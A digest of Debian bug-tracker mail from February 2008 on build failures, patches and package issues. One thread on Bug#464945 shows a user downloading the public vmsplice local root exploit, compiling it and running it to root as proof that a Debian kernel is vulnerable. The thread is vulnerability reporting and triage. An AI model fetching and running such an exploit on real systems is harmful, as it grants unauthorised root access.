Bug#464851: [python-odtwriter] package name wrong?

2008-02-10 Thread Michael Schutte
On Sat, Feb 09, 2008 at 02:20:26PM +0100, Bernd Zeimetz wrote:
 So python-docutils-writers-odtwriter would be the right name in theory,
 but this doesn't make sense, indeed.

Does anybody insist on that name?  If not, I’m going to update the long
description to mention the relationship to python-docutils, which
probably would have avoided that bug report in the first place.

Cheers,
-- 
Michael Schutte [EMAIL PROTECTED]


signature.asc
Description: Digital signature


Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-10 Thread Stefan Fritsch
 Just try explot from http://www.milw0rm.com/exploits/5092 at my
 linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
 from 2.6.24.1 kernel (CVE-2008-0009/10).

2.6.24.1 does not fix the issue, see

http://marc.info/?l=linux-kernelm=120262352612128w=2

I have also verified that the lenny 2.6.22 kernel is vulnerable.


signature.asc
Description: This is a digitally signed message part.


Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-10 Thread Stefan Fritsch
I also checked that linux-image-2.6.18-5-k7 2.6.18.dfsg.1-17 is 
vulnerable.


signature.asc
Description: This is a digitally signed message part.


Processed: Re: Bug#464019: Please binNMU rsstail in all archs

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 severity 464019 important
Bug#464019: libmrss0 breaks newsbeuter
Severity set to `important' from `grave'

 tags 464019 + wontfix
Bug#464019: libmrss0 breaks newsbeuter
There were no tags set.
Tags added: wontfix

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-10 Thread Florian Weimer
* Okulov Vitaliy:

 Just try explot from http://www.milw0rm.com/exploits/5092 at my
 linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
 from 2.6.24.1 kernel (CVE-2008-0009/10).

Milw0rm is down.  Are you sure the exploit is real?  The vulnerable code
is not present in the 2.6.18 kernel.




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions

2008-02-10 Thread Guillem Jover
Package: libqt3-mt
Version: 3:3.3.8b-1
Severity: serious

Hi,

The Qt shared libraries were providing weak symbols for stat64,
lstat64 and fstat64 until version 3:3.3.7-9, but not anymore, other
Qt/KDE apps depend on those symbols, so they get terminated when the
symbols cannot be resolved during runtime (as the linking is done
lazyly). Affected applications I've seen terminate during runtime or
just when starting: gwenview and k3b.

regards,
guillem



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-10 Thread Florian Weimer
* Vitaliy Okulov:

 Yep, im sure.

Ah, okay, but I think this is not CVE-2008-0009 or CVE-2008-0010.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-10 Thread Vitaliy Okulov
Yep, im sure.

Copy of exploit: http://www.securityfocus.com/bid/27704/exploit

[EMAIL PROTECTED]:~/coding/sample$ wget
http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
--12:25:09--
http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
  = `27704.c'
Resolving downloads.securityfocus.com... 205.206.231.23
Connecting to downloads.securityfocus.com|205.206.231.23|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,264 (6.1K) [text/plain]

100%[=]
6,264 28.84K/s

12:25:10 (28.75 KB/s) - `27704.c' saved [6264/6264]

[EMAIL PROTECTED]:~/coding/sample$ vi 27704.c
[EMAIL PROTECTED]:~/coding/sample$ uname -a
Linux doktor 2.6.18-6-686 #1 SMP Wed Jan 23 03:23:22 UTC 2008 i686 GNU/Linux
[EMAIL PROTECTED]:~/coding/sample$ id
uid=1000(doktor) gid=1000(doktor)
groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(doktor),1001(shutdown),1002(vboxusers)
[EMAIL PROTECTED]:~/coding/sample$ head -n 20 27704.c
/*
 * jessica_biel_naked_in_my_bed.c
 *
 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
 * Stejnak je to stare jak cyp a aj jakesyk rozbite.
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 *
 * This is quite old code and I had to rewrite it to even compile.
 * It should work well, but I don't remeber original intent of all
 * the code, so I'm not 100% sure about it. You've been warned ;)
 *
 * -static -Wno-format
 */
#define _GNU_SOURCE
#include stdio.h
[EMAIL PROTECTED]:~/coding/sample$ gcc -static -Wno-format 27704.c -o root_expl
[EMAIL PROTECTED]:~/coding/sample$ ./root_expl
---
 Linux vmsplice Local Root Exploit
 By qaaz
---
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7fc8000 .. 0xb7ffa000
[+] root
[EMAIL PROTECTED]:~/coding/sample# id
uid=0(root) gid=0(root)
groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(doktor),1001(shutdown),1002(vboxusers)
[EMAIL PROTECTED]:~/coding/sample# exit
[EMAIL PROTECTED]:~/coding/sample$

So exploit works.

2008/2/10, Florian Weimer [EMAIL PROTECTED]:

 * Okulov Vitaliy:

  Just try explot from http://www.milw0rm.com/exploits/5092 at my
  linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
  from 2.6.24.1 kernel (CVE-2008-0009/10).

 Milw0rm is down.  Are you sure the exploit is real?  The vulnerable code
 is not present in the 2.6.18 kernel.




Bug#464384: elinks_0.12~20080127-1(experimental/amd64/xenophanes): -Werror, warning: cast from pointer to integer of different size

2008-02-10 Thread Kalle Olavi Niemitalo
Y Giridhar Appaji Nag [EMAIL PROTECTED] quotes:

 make[4]: Entering directory 
 `/tmp/buildd/elinks-0.12~20080127/build-main/src/protocol/smb'
   [CC]   src/protocol/smb/smb2.o
 cc1: warnings being treated as errors
 /tmp/buildd/elinks-0.12~20080127/src/protocol/smb/smb2.c: In function 
 'do_smb':
 /tmp/buildd/elinks-0.12~20080127/src/protocol/smb/smb2.c:352: warning: format 
 '%lld' expects type 'long long int', but argument 3 has type '__off_t'
 make[4]: *** [smb2.o] Error 1

Thank you.  I pushed the following patch, which should fix these.

Debian bug 464384: fix OFF_T_FORMAT mismatches on amd64

On AMD64 apparently, off_t is long but ELinks detected SIZEOF_OFF_T == 8
and defined OFF_T_FORMAT as lld, which expects long long and so causes
GCC to warn about a mismatching format specifier.  Because --enable-debug
adds -Werror to $CFLAGS, this warning breaks the build.  When both
SIZEOF_LONG and SIZEOF_LONG_LONG are 8, ELinks cannot know which type
it should use.

To fix this, do not attempt to find a format specifier for off_t itself.
Instead cast all printed off_t values to a new typedef off_print_T that
is large enough, and replace OFF_T_FORMAT with OFF_PRINT_FORMAT which
is suitable for off_print_T altough not necessarily for off_t.  ELinks
already had a similar scheme with time_print_T and TIME_PRINT_FORMAT.

---
commit 61019c31304f89141248b0381974d1e3886cf160
tree a3343d1895bfd6892bbc6cf275930c513a508bec
parent 6555359f8e56b6e08bd1a8f40fd363506a0e3ff5
author Kalle Olavi Niemitalo [EMAIL PROTECTED] Sun, 10 Feb 2008 11:20:33 +0200
committer Kalle Olavi Niemitalo [EMAIL PROTECTED] Sun, 10 Feb 2008 11:30:27 
+0200

 src/cache/cache.c   |8 +---
 src/cache/dialogs.c |8 
 src/dialogs/document.c  |5 +++--
 src/osdep/types.h   |   22 +-
 src/protocol/fsp/fsp.c  |3 ++-
 src/protocol/ftp/ftp.c  |3 ++-
 src/protocol/smb/smb2.c |3 ++-
 7 files changed, 35 insertions(+), 17 deletions(-)

diff --git a/src/cache/cache.c b/src/cache/cache.c
index db9efe1..8b05080 100644
--- a/src/cache/cache.c
+++ b/src/cache/cache.c
@@ -40,9 +40,11 @@ static void truncate_entry(struct cache_entry *cached, off_t 
offset, int final);
 
 #define dump_frag(frag, count) \
 do { \
-   DBG( [%d] f=%p offset=% OFF_T_FORMAT  length=% OFF_T_FORMAT \
-real_length=% OFF_T_FORMAT, \
-   count, frag, frag-offset, frag-length, frag-real_length); \
+   DBG( [%d] f=%p offset=% OFF_PRINT_FORMAT \
+length=% OFF_PRINT_FORMAT \
+real_length=% OFF_PRINT_FORMAT, \
+   count, frag, (off_print_T) frag-offset, \
+   (off_print_T) frag-length, (off_print_T) frag-real_length); \
 } while (0)
 
 #define dump_frags(entry, comment) \
diff --git a/src/cache/dialogs.c b/src/cache/dialogs.c
index b0a33b3..29a9446 100644
--- a/src/cache/dialogs.c
+++ b/src/cache/dialogs.c
@@ -82,10 +82,10 @@ get_cache_entry_info(struct listbox_item *item, struct 
terminal *term)
}
}
 
-   add_format_to_string(msg, \n%s: % OFF_T_FORMAT, _(Size, term),
-cached-length);
-   add_format_to_string(msg, \n%s: % OFF_T_FORMAT, _(Loaded size, 
term),
-   cached-data_size);
+   add_format_to_string(msg, \n%s: % OFF_PRINT_FORMAT, _(Size, term),
+(off_print_T) cached-length);
+   add_format_to_string(msg, \n%s: % OFF_PRINT_FORMAT, _(Loaded size, 
term),
+(off_print_T) cached-data_size);
if (cached-content_type) {
add_format_to_string(msg, \n%s: %s, _(Content type, term),
 cached-content_type);
diff --git a/src/dialogs/document.c b/src/dialogs/document.c
index ba55ea2..458e839 100644
--- a/src/dialogs/document.c
+++ b/src/dialogs/document.c
@@ -152,8 +152,9 @@ document_info_dialog(struct session *ses)
if (cached) {
unsigned char *a;
 
-   add_format_to_string(msg, \n%s: % OFF_T_FORMAT,
-_(Size, term), cached-length);
+   add_format_to_string(msg, \n%s: % OFF_PRINT_FORMAT,
+_(Size, term),
+(off_print_T) cached-length);
 
if (cached-incomplete) {
add_format_to_string(msg,  (%s), _(incomplete, 
term));
diff --git a/src/osdep/types.h b/src/osdep/types.h
index 2404ac0..f1c42f8 100644
--- a/src/osdep/types.h
+++ b/src/osdep/types.h
@@ -146,12 +146,24 @@ typedef unsigned long long uint32_t;
  */
 typedef long longptr_T;
 
-/* Define internal off_t format macro for printing variables. */
-#if HAVE_OFF_T == 1  SIZEOF_OFF_T == 8
-#define OFF_T_FORMAT lld
+/* To print off_t offset, ELinks does:
+ *
+ * printf(% OFF_PRINT_FORMAT, (off_print_T) offset);
+ *
+ * The cast is necessary because it is not possible to guess
+ * a printf format for off_t itself 

Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-10 Thread Vitaliy Okulov
Oh, just reread http://marc.info/?l=linux-kernelm=120262352612128w=2

Thereis no bugfix.

Whait for Jens Axboe to fix this patch.

2008/2/10, Vitaliy Okulov [EMAIL PROTECTED]:

 Hm, maybe, but i read http://www.securityfocus.com/bid/27705/solution

 The vendor released version 2.6.24.1 to address these issues. Please see
 the references for more information.

 And then read http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1where 
 i found only 1 bugfix for vmsplice.

 2008/2/10, Florian Weimer [EMAIL PROTECTED]:
 
  * Vitaliy Okulov:
 
   Yep, im sure.
 
  Ah, okay, but I think this is not CVE-2008-0009 or CVE-2008-0010.
 




Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-10 Thread Vitaliy Okulov
Hm, maybe, but i read http://www.securityfocus.com/bid/27705/solution

The vendor released version 2.6.24.1 to address these issues. Please see
the references for more information.

And then read http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1where
i found only 1 bugfix for vmsplice.

2008/2/10, Florian Weimer [EMAIL PROTECTED]:

 * Vitaliy Okulov:

  Yep, im sure.

 Ah, okay, but I think this is not CVE-2008-0009 or CVE-2008-0010.



Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-10 Thread Florian Weimer
* Vitaliy Okulov:

 Oh, just reread http://marc.info/?l=linux-kernelm=120262352612128w=2

 Thereis no bugfix.

Yes, it appears to be a different bug.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Workaround will be applied to packagesearch

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 unblock 458884 by 458558
Bug#458558: libqt4-dev: qmake adds --no-undefined to Makefile for LIB template 
- causes linker errors
Bug#458884: packagesearch: FTBFS: aptplugincontainer.cpp:(.text+0xb1): 
undefined reference to `NPlugin::BasePluginContainer::~BasePluginContainer()'
Was blocked by: 458558
Blocking bugs of 458884 removed: 458558

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464282: marked as done (atlas: FTBFS: prompts during build)

2008-02-10 Thread Debian Bug Tracking System
Your message dated Sun, 10 Feb 2008 11:23:47 +0100
with message-id [EMAIL PROTECTED]
and subject line atlas: FTBFS: prompts during build 
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: atlas
version: 3.6.0-21.2
Severity: serious
User: [EMAIL PROTECTED]
Usertags: qa-ftbfs-20080205 qa-ftbfs
Justification: FTBFS on i386

Hi,

During a rebuild of all packages in sid, your package failed to build on i386.

Relevant part:

  dpkg-source: building atlas in atlas_3.6.0-21.2.dsc
   debian/rules build
  [ -e debian/i386/base/applied_sys ] || ! [ -e debian/i386/base/patch_sys ] 
  || \
   patch -p1  debian/i386/base/patch_sys
  touch debian/i386/base/applied_sys
  dh_testdir
  make killall arch=Linux_3dnow_static
  make[1]: Entering directory `/build/user/atlas-3.6.0'
  make -f Make.top killall arch=Linux_3dnow_static
  make[2]: Entering directory `/build/user/atlas-3.6.0'
  Make.top:2: Make.Linux_3dnow_static: No such file or directory
  make[2]: *** No rule to make target `Make.Linux_3dnow_static'.  Stop.
  make[2]: Leaving directory `/build/user/atlas-3.6.0'
  make[1]: *** [killall] Error 2
  make[1]: Leaving directory `/build/user/atlas-3.6.0'
  make: [bin/Linux_3dnow_static/Make.inc] Error 2 (ignored)
  chmod +x debian/config.expect
  [ -n  ] || . debian/i386/3dnow/env ; \
   ARCH_DIR=Linux_3dnow_static CACHE_SIZE= BIT=1 DEFAULTS=y \
   TDNCOMP=y debian/config.expect
  spawn make

  make[1]: Entering directory `/build/user/atlas-3.6.0'
  gcc-4.3 -o xconfig config.c
  /tmp/ccIA2tMk.o: In function `CmndResults':
  config.c:(.text+0x936): warning: the use of `tmpnam' is dangerous, better 
  use `mkstemp'
  ./xconfig
  ATLAS3.6.0 configure started.
  
  160
  159
  158
  157
  156
  155
  154
  153
  152
  151
  150
  149
  148
  147
  146
  145
  144
  143
  142
  141
  140
  139
  138
  137
  136
  135
  134
  133
  132
  131
  130
  129
  128
  127
  126
  125
  124
  123
  122
  121
  120
  119
  118
  117
  116
  115
  114
  113
  112
  111
  110
  109
  108
  107
  106
  105
  104
  103
  102
  101
  100
  099
  098
  097
  096
  095
  094
  093
  092
  091
  090
  089
  088
  087
  086
  085
  084
  083
  082
  081
  080
  079
  078
  077
  076
  075
  074
  073
  072
  071
  070
  069
  068
  067
  066
  065
  064
  063
  062
  061
  060
  059
  058
  057
  056
  055
  054
  053
  052
  051
  050
  049
  048
  047
  046
  045
  044
  043
  042
  041
  040
  039
  038
  037
  036
  035
  034
  033
  032
  031
  030
  029
  028
  027
  026
  025
  024
  023
  022
  021
  020
  019
  018
  017
  016
  015
  014
  013
  012
  011
  010
  009
  008
  007
  006
  005
  004
  003
  002
  001
  Enter number at top left of screen [0]: ^J
  ===
IMPORTANT
  ===
  Before going any further, check
 http://math-atlas.sourceforge.net/errata.html
  This is the ATLAS errata file, which keeps a running count of all known
  ATLAS bugs and system problems, with associated workarounds or fixes.
  IF YOU DO NOT CHECK THIS FILE, YOU MAY BE COMPILING A LIBRARY WITH KNOWN 
  BUGS.
  
  Have you scoped the errata file? [y]: ^J
  Configure will ask a series of questions, in one of two forms.  The first 
  form
  of question is a menu of choices.  One option in almost all menus is
  'Other/UNKNOWN'.  If you are unsure of the answer, always choose this option.
  The second form of question is a single line, with a default answer shown in
  square braces.  If you hit return without typing anything, this default 
  answer
  will be used.  Again, if you are unsure of the answer, simply accept the
  default.
  
  ATLAS can detect almost everything it needs to know, so choosing the default
  or 'Other/UNKNOWN' will at worst simply extend the install time (if you tell
  config the answer to something ATLAS can skip some tests).
  
  Configure makes no changes to the state of things until all questions have
  been asked and answered.  Therefore, if you get confused and want to start
  over, feel free to break out of this program (CTRL-C, CTRL-BREAK, etc)
  and start again.  Alternatively, if you make a mistake you can finish the
  configure process, and then edit the created make include file by hand to fix
  the mistake manually (the name and location of this file will be printed
  out at the end of configure).
  
  If you have 

Processed: Re: Bug#435645: Bug seen with 2.1.5-4

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 retitle 435645 pumount does not play nicely with symlinks in /etc/fstab
Bug#435645: Refuse to eject cdrom
Changed Bug title to `pumount does not play nicely with symlinks in /etc/fstab' 
from `Refuse to eject cdrom'.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#435645: Bug seen with 2.1.5-4

2008-02-10 Thread Vincent Fourmond
retitle 435645 pumount does not play nicely with symlinks in /etc/fstab
thanks

  Hello,

Klaus Ethgen wrote:
 Well, my cdrom is no scsi. So:
~ pumount -d /cdrom  
checking whether /cdrom is a mounted directory
resolved mount point /cdrom to device /dev/hdc
resolved /dev/hdc to device /dev/hdc
Checking for device '/dev/hdc' in '/etc/fstab'
Checking for device '/dev/hdc' in '/etc/mtab'
Error: mount point /cdrom is not below /media/
 
~ pumount -d /dev/hdc
checking whether /dev/hdc is a mounted directory
resolved /dev/hdc to device /dev/hdc
Checking for device '/dev/hdc' in '/etc/fstab'
Checking for device '/dev/hdc' in '/etc/mtab'
Error: mount point /cdrom is not below /media/

  Thanks. I think I might understand the problem here. Just to make
sure, could you please provide the output of:

pmount -d /dev/cdrom

   Well, the great thing about pmount is that it precisely calls mount
 for devices in /etc/fstab - saving trouble (except, of course, when that
 behavior is buggy).
 
 True. But why was it changed from a working state to using pumount for
 devices not under /media?

  I'll need to investigate that. I've been neglecting pmount for a
while, and the bug count keeps increasing...

  Cheers,

Vincent

-- 
Vincent Fourmond, Debian Developer
http://vince-debian.blogspot.com/
-- pretty boring signature, isn't it ?



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#450711: Bugtracker error

2008-02-10 Thread Jos
The last mail including the requested files, I've send it to both you 
and the BTS


Mike Markley schreef:

On Fri, Feb 08, 2008 at 11:41:07AM +0100, Jos [EMAIL PROTECTED] wrote:
  
I send the requested files 3 times, but got no confirmation from the 
bugtracker.

Maybe a spamfilter is blocking the mail?



Are you sending it just to the BTS, or to both me and the BTS?

  




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465032: washngo: FTBFS: At least the following dependencies are missing: regex-compat -any, parsec -any

2008-02-10 Thread Kurt Roeckx
Package: washngo
Version: 2.12-2
Severity: serious

Hi,

Your package is failing to build with the following error:
./setup configure --with-compiler=/usr/bin/ghc6 
--prefix=/usr/lib/haskell-packages/ghc6
Configuring WashNGo-2.12...
setup: At least the following dependencies are missing:
regex-compat -any, parsec -any
make: *** [build-stamp] Error 1


Kurt




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464307: marked as done (python2.5: FTBFS: dpkg-checkbuilddeps: error: syntax error in debian/control at line 34: duplicate field Replaces found)

2008-02-10 Thread Debian Bug Tracking System
Your message dated Sun, 10 Feb 2008 10:17:07 +
with message-id [EMAIL PROTECTED]
and subject line Bug#464307: fixed in python2.5 2.5.1-7
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: python2.5
version: 2.5.1-6
Severity: serious
User: [EMAIL PROTECTED]
Usertags: qa-ftbfs-20080205 qa-ftbfs
Justification: FTBFS on i386

Hi,

During a rebuild of all packages in sid, your package failed to build on i386.

Relevant part:

  ** Using build dependencies supplied by package:
  Build-Depends: autoconf, automake1.9, blt-dev (= 2.4z), bzip2, debhelper 
  (= 5), gcc (= 4:4.2) | gcc-4.1 (= 4.1.2-4) [alpha powerpc ppc64 s390 
  sparc], libbluetooth-dev [!hurd-i386 !kfreebsd-i386 !kfreebsd-amd64], 
  libbz2-dev, libdb-dev (= 4.6), libffi4-dev (= 4.1.2), libgdbm-dev, 
  libgpmg1 [!hurd-i386 !kfreebsd-i386 !kfreebsd-amd64], libncursesw5-dev (= 
  5.3), libreadline5-dev, libsqlite3-dev, libssl-dev, locales, lsb-release, 
  mime-support, netbase, sharutils, tk8.4-dev, zlib1g-dev
  Build-Depends-Indep: debiandoc-sgml, emacs22, libhtml-tree-perl, sharutils, 
  texinfo, texlive-latex-recommended
  Build-Conflicts: python-xml, python2.5-xml, tcl8.3-dev, tk8.3-dev
  Checking for already installed source dependencies...
  autoconf: missing
  automake1.9: missing
  blt-dev: missing
  Using default version 2.4z-4
  bzip2: already installed (1.0.4-2)
  debhelper: missing
  Using default version 6.0.5
  gcc: already installed (4:4.2.2-2 = 4:4.2 is satisfied)
  libbluetooth-dev: missing
  libbz2-dev: missing
  libdb-dev: missing
  Using default version 4.6.21-5
  libffi4-dev: missing
  Using default version 4.3-20080202-1
  libgdbm-dev: missing
  libgpmg1: missing
  libncursesw5-dev: missing
  Using default version 5.6+20080119-1
  libreadline5-dev: missing
  libsqlite3-dev: missing
  libssl-dev: missing
  locales: missing
  lsb-release: missing
  mime-support: missing
  netbase: missing
  sharutils: missing
  tk8.4-dev: missing
  zlib1g-dev: missing
  python-xml: already deinstalled
  python2.5-xml: already deinstalled
  tcl8.3-dev: already deinstalled
  tk8.3-dev: already deinstalled
  debiandoc-sgml: missing
  emacs22: missing
  libhtml-tree-perl: missing
  sharutils: missing
  texinfo: missing
  texlive-latex-recommended: missing
  Checking for source dependency conflicts...
  Reading package lists...
  Building dependency tree...
  Reading state information...
  The following packages were automatically installed and are no longer 
  required:
lib64gcc1 libc6-amd64
  Use 'apt-get autoremove' to remove them.
  The following extra packages will be installed:
automake autotools-dev blt bsdmainutils defoma ed emacs22-bin-common
emacs22-common emacsen-common file fontconfig-config gettext gettext-base
groff-base html2text ifupdown intltool-debian libbluetooth2 libexpat1
libffi4 libfontconfig1 libfreetype6 libhtml-parser-perl libhtml-tagset-perl
libice-dev libice6 libjpeg62 libkpathsea4 liblockfile1 libmagic1
libncurses5-dev libncursesw5 libnewt0.52 libpng12-0 libpoppler2 libpopt0
libroman-perl libsgmls-perl libsm-dev libsm6 libsp1c2 libsqlite3-0
libssl0.9.8 libtext-format-perl libtiff4 libungif4g liburi-perl libx11-6
libx11-data libx11-dev libxau-dev libxau6 libxaw7 libxdmcp-dev libxdmcp6
libxext-dev libxext6 libxml2 libxmu6 libxpm4 libxt-dev libxt6 m4 man-db
net-tools po-debconf python python-minimal python2.4 python2.4-minimal
sgml-base sgml-data sgmlspl sp tcl8.4 tcl8.4-dev tex-common texlive-base
texlive-base-bin texlive-common texlive-doc-base texlive-latex-base tk8.4
ttf-dejavu ttf-dejavu-core ttf-dejavu-extra ucf whiptail x11-common
x11proto-core-dev x11proto-input-dev x11proto-kb-dev x11proto-xext-dev
xaw3dg xml-core xtrans-dev
  Suggested packages:
autobook autoconf-archive autoconf-doc autoconf2.13 gnu-standards
automake1.9-doc blt-demo wamerican wordlist whois vacation dh-make
debiandoc-sgml-doc latex-cjk-all hlatex littex defoma-doc dfontmgr 
  psfontmgr
x-ttcidfont-conf emacs22-common-non-dfsg emacs22-el cvs gettext-doc groff
iproute dhcp3-client dhcp-client ppp pkg-config db4.6-doc libfreetype6-dev
gpm sgmls-doc sqlite3-doc libwww-perl lsb www-browser python-doc python-tk
python-profiler python2.4-doc binfmt-support sgml-base-doc perlsgml
doc-html-w3 opensp libxml2-utils mailx doc-base tclreadline tcl8.4-doc
texinfo-doc-nonfree texlive-generic-recommended xpdf-reader pdf-viewer gv
postscript-viewer tk8.4-doc
  Recommended 

Bug#465039: erlang: FTBFS: megaco_flex_scanner_drv.flex:1: bad character: /

2008-02-10 Thread Kurt Roeckx
Package: erlang
Version: 1:12.b.1-dfsg-1
Severity: serious

Hi,

Your package is failing to build with the following error:
flex -Ca -Pmegaco_flex_scanner_drv -omegaco_flex_scanner_drv.c 
megaco_flex_scanner_drv.flex
megaco_flex_scanner_drv.flex:1: bad character: /
megaco_flex_scanner_drv.flex:1: bad character: *
megaco_flex_scanner_drv.flex:1: bad character: 
megaco_flex_scanner_drv.flex:1: unknown error processing section 1
megaco_flex_scanner_drv.flex:1: unknown error processing section 1
megaco_flex_scanner_drv.flex:1: bad character: 
megaco_flex_scanner_drv.flex:2: bad character: *
megaco_flex_scanner_drv.flex:2: bad character: 
megaco_flex_scanner_drv.flex:2: unknown error processing section 1
megaco_flex_scanner_drv.flex:2: bad character: 
megaco_flex_scanner_drv.flex:2: bad character: 2
megaco_flex_scanner_drv.flex:2: bad character: 0
[...]


Kurt




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465036: ski: FTBFS: checking for pkg-config... no

2008-02-10 Thread Kurt Roeckx
Package: ski
Version: 1.3.2-1
Severity: serious

Hi,

Your package is failing to build with the following error:
checking for X... no
checking for pkg-config... no
checking for GSKI... configure: error: The pkg-config script could not be found 
or is too old.  Make sure it
is in your PATH or set the PKG_CONFIG environment variable to the full
path to pkg-config.

Alternatively, you may set the environment variables GSKI_CFLAGS
and GSKI_LIBS to avoid the need to call pkg-config.
See the pkg-config man page for more details.

To get pkg-config, see http://pkg-config.freedesktop.org/.
See `config.log' for more details.
make: *** [config.status] Error 1


It's missing atleast a build dependency on pkg-config.


Kurt




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465035: libcomplearn-mod-ppmdx: FTBFS on 64 bit arches.

2008-02-10 Thread Kurt Roeckx
Package: libcomplearn-mod-ppmdx
Version: 1.0.6-3
Severity: serious

Hi,

It seems you changed from a arch any packages to one that lists all the
arches, but removed all the 64 bit arches.  I can't see a good reason
why you did that.

I'm guessing that this is related to ppmd failing to build on those
arches (#370419)?  That's not a reason to restrict the architectures
in your package.  However, that can be a good reason to get added
to Packages-Arch-Specific.

Note that version 1.0.6-1 in available in unstable on those arches.  If
you think it's broken you should get those versions removed from
unstable first.


Kurt




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465034: libcomplearn-mod-ppmd: FTBFS on 64 bit arches.

2008-02-10 Thread Kurt Roeckx
Package: libcomplearn-mod-ppmd
Version: 1.0.6-3
Severity: serious

Hi,

It seems you changed from a arch any packages to one that lists all the
arches, but removed all the 64 bit arches.  I can't see a good reason
why you did that.

I'm guessing that this is related to ppmd failing to build on those
arches (#370419)?  That's not a reason to restrict the architectures
in your package.  However, that can be a good reason to get added
to Packages-Arch-Specific.

Note that version 1.0.6-1 in available in unstable on those arches.  If
you think it's broken you should get those versions removed from
unstable first.


Kurt




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#457888: marked as done (zapping: Crash in Channel Editor)

2008-02-10 Thread Debian Bug Tracking System
Your message dated Sun, 10 Feb 2008 10:47:03 +
with message-id [EMAIL PROTECTED]
and subject line Bug#457888: fixed in zapping 0.10~cvs6-1
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
